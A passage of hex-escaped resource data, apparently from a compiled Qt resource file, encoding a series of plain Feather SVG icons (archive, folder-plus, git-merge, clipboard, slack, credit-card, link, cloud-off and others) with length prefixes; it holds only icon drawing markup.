\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x63\x68\x69\
\x76\x65\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x32\x31\x20\x38\x20\x32\x31\x20\x32\x31\
\x20\x33\x20\x32\x31\x20\x33\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x31\
\x22\x20\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\
\x32\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x35\x22\x3e\x3c\x2f\
\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x30\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\
\x34\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x95\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x6f\x6c\x64\x65\
\x72\x2d\x70\x6c\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x32\x32\x20\x31\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x20\x32\x48\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x2d\x32\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x2d\x32\x68\x35\x6c\x32\x20\x33\x68\x39\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x31\x31\x22\x20\x78\x32\x3d\x22\x31\
\x32\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\
\x31\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\
\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x16\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x72\x61\x6d\x65\
\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\x31\
\x36\x56\x39\x68\x31\x34\x56\x32\x48\x35\x6c\x31\x34\x20\x31\x34\
\x68\x2d\x37\x6d\x2d\x37\x20\x30\x6c\x37\x20\x37\x76\x2d\x37\x6d\
\x2d\x37\x20\x30\x68\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x50\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x74\x2d\x6d\
\x65\x72\x67\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x31\x38\x22\x20\x63\x79\x3d\x22\x31\x38\x22\x20\x72\x3d\
\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\
\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x36\x22\x20\x63\x79\x3d\x22\
\x36\x22\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x20\x32\x31\
\x56\x39\x61\x39\x20\x39\x20\x30\x20\x30\x20\x30\x20\x39\x20\x39\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x73\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x69\x70\x62\
\x6f\x61\x72\x64\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x36\x20\x34\x68\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x20\x32\x76\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x20\x32\x48\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x2d\x32\x56\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x2d\x32\x68\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x38\x22\x20\x79\x3d\x22\x32\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x38\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x34\x22\x20\x72\x78\x3d\x22\x31\x22\x20\x72\x79\
\x3d\x22\x31\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x03\xe7\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6c\x61\x63\x6b\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x34\x2e\x35\
\x20\x31\x30\x63\x2d\x2e\x38\x33\x20\x30\x2d\x31\x2e\x35\x2d\x2e\
\x36\x37\x2d\x31\x2e\x35\x2d\x31\x2e\x35\x76\x2d\x35\x63\x30\x2d\
\x2e\x38\x33\x2e\x36\x37\x2d\x31\x2e\x35\x20\x31\x2e\x35\x2d\x31\
\x2e\x35\x73\x31\x2e\x35\x2e\x36\x37\x20\x31\x2e\x35\x20\x31\x2e\
\x35\x76\x35\x63\x30\x20\x2e\x38\x33\x2d\x2e\x36\x37\x20\x31\x2e\
\x35\x2d\x31\x2e\x35\x20\x31\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\x2e\
\x35\x20\x31\x30\x48\x31\x39\x56\x38\x2e\x35\x63\x30\x2d\x2e\x38\
\x33\x2e\x36\x37\x2d\x31\x2e\x35\x20\x31\x2e\x35\x2d\x31\x2e\x35\
\x73\x31\x2e\x35\x2e\x36\x37\x20\x31\x2e\x35\x20\x31\x2e\x35\x2d\
\x2e\x36\x37\x20\x31\x2e\x35\x2d\x31\x2e\x35\x20\x31\x2e\x35\x7a\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x39\x2e\x35\x20\x31\x34\x63\x2e\x38\x33\x20\x30\x20\
\x31\x2e\x35\x2e\x36\x37\x20\x31\x2e\x35\x20\x31\x2e\x35\x76\x35\
\x63\x30\x20\x2e\x38\x33\x2d\x2e\x36\x37\x20\x31\x2e\x35\x2d\x31\
\x2e\x35\x20\x31\x2e\x35\x53\x38\x20\x32\x31\x2e\x33\x33\x20\x38\
\x20\x32\x30\x2e\x35\x76\x2d\x35\x63\x30\x2d\x2e\x38\x33\x2e\x36\
\x37\x2d\x31\x2e\x35\x20\x31\x2e\x35\x2d\x31\x2e\x35\x7a\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x33\x2e\x35\x20\x31\x34\x48\x35\x76\x31\x2e\x35\x63\x30\x20\
\x2e\x38\x33\x2d\x2e\x36\x37\x20\x31\x2e\x35\x2d\x31\x2e\x35\x20\
\x31\x2e\x35\x53\x32\x20\x31\x36\x2e\x33\x33\x20\x32\x20\x31\x35\
\x2e\x35\x20\x32\x2e\x36\x37\x20\x31\x34\x20\x33\x2e\x35\x20\x31\
\x34\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x31\x34\x20\x31\x34\x2e\x35\x63\x30\x2d\x2e\
\x38\x33\x2e\x36\x37\x2d\x31\x2e\x35\x20\x31\x2e\x35\x2d\x31\x2e\
\x35\x68\x35\x63\x2e\x38\x33\x20\x30\x20\x31\x2e\x35\x2e\x36\x37\
\x20\x31\x2e\x35\x20\x31\x2e\x35\x73\x2d\x2e\x36\x37\x20\x31\x2e\
\x35\x2d\x31\x2e\x35\x20\x31\x2e\x35\x68\x2d\x35\x63\x2d\x2e\x38\
\x33\x20\x30\x2d\x31\x2e\x35\x2d\x2e\x36\x37\x2d\x31\x2e\x35\x2d\
\x31\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x35\x2e\x35\x20\x31\x39\x48\x31\
\x34\x76\x31\x2e\x35\x63\x30\x20\x2e\x38\x33\x2e\x36\x37\x20\x31\
\x2e\x35\x20\x31\x2e\x35\x20\x31\x2e\x35\x73\x31\x2e\x35\x2d\x2e\
\x36\x37\x20\x31\x2e\x35\x2d\x31\x2e\x35\x2d\x2e\x36\x37\x2d\x31\
\x2e\x35\x2d\x31\x2e\x35\x2d\x31\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x30\
\x20\x39\x2e\x35\x43\x31\x30\x20\x38\x2e\x36\x37\x20\x39\x2e\x33\
\x33\x20\x38\x20\x38\x2e\x35\x20\x38\x68\x2d\x35\x43\x32\x2e\x36\
\x37\x20\x38\x20\x32\x20\x38\x2e\x36\x37\x20\x32\x20\x39\x2e\x35\
\x53\x32\x2e\x36\x37\x20\x31\x31\x20\x33\x2e\x35\x20\x31\x31\x68\
\x35\x63\x2e\x38\x33\x20\x30\x20\x31\x2e\x35\x2d\x2e\x36\x37\x20\
\x31\x2e\x35\x2d\x31\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x38\x2e\x35\x20\x35\
\x48\x31\x30\x56\x33\x2e\x35\x43\x31\x30\x20\x32\x2e\x36\x37\x20\
\x39\x2e\x33\x33\x20\x32\x20\x38\x2e\x35\x20\x32\x53\x37\x20\x32\
\x2e\x36\x37\x20\x37\x20\x33\x2e\x35\x20\x37\x2e\x36\x37\x20\x35\
\x20\x38\x2e\x35\x20\x35\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x49\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x72\x65\x64\x69\
\x74\x2d\x63\x61\x72\x64\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\
\x22\x31\x22\x20\x79\x3d\x22\x34\x22\x20\x77\x69\x64\x74\x68\x3d\
\x22\x32\x32\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x36\x22\
\x20\x72\x78\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\
\x2f\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\x3d\x22\x32\
\x33\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x5a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x78\x2d\x63\x69\x72\
\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\
\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x39\
\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x31\x35\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x39\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\
\x31\x35\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x73\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x69\x6e\x6b\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x30\x20\x31\x33\
\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\x20\x37\x2e\x35\x34\x2e\
\x35\x34\x6c\x33\x2d\x33\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\
\x2d\x37\x2e\x30\x37\x2d\x37\x2e\x30\x37\x6c\x2d\x31\x2e\x37\x32\
\x20\x31\x2e\x37\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x34\x20\x31\x31\x61\x35\x20\
\x35\x20\x30\x20\x30\x20\x30\x2d\x37\x2e\x35\x34\x2d\x2e\x35\x34\
\x6c\x2d\x33\x20\x33\x61\x35\x20\x35\x20\x30\x20\x30\x20\x30\x20\
\x37\x2e\x30\x37\x20\x37\x2e\x30\x37\x6c\x31\x2e\x37\x31\x2d\x31\
\x2e\x37\x31\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x73\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x75\x64\
\x2d\x6f\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x32\x32\x2e\x36\x31\x20\x31\x36\x2e\x39\x35\x41\x35\x20\x35\x20\
\x30\x20\x30\x20\x30\x20\x31\x38\x20\x31\x30\x68\x2d\x31\x2e\x32\
\x36\x61\x38\x20\x38\x20\x30\x20\x30\x20\x30\x2d\x37\x2e\x30\x35\
\x2d\x36\x4d\x35\x20\x35\x61\x38\x20\x38\x20\x30\x20\x30\x20\x30\
\x20\x34\x20\x31\x35\x68\x39\x61\x35\x20\x35\x20\x30\x20\x30\x20\
\x30\x20\x31\x2e\x37\x2d\x2e\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\
\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\
\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\xac\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x65\x73\x73\x61\
\x67\x65\x2d\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x32\x31\x20\x31\x31\x2e\x35\x61\x38\x2e\x33\
\x38\x20\x38\x2e\x33\x38\x20\x30\x20\x30\x20\x31\x2d\x2e\x39\x20\
\x33\x2e\x38\x20\x38\x2e\x35\x20\x38\x2e\x35\x20\x30\x20\x30\x20\
\x31\x2d\x37\x2e\x36\x20\x34\x2e\x37\x20\x38\x2e\x33\x38\x20\x38\
\x2e\x33\x38\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x38\x2d\x2e\x39\
\x4c\x33\x20\x32\x31\x6c\x31\x2e\x39\x2d\x35\x2e\x37\x61\x38\x2e\
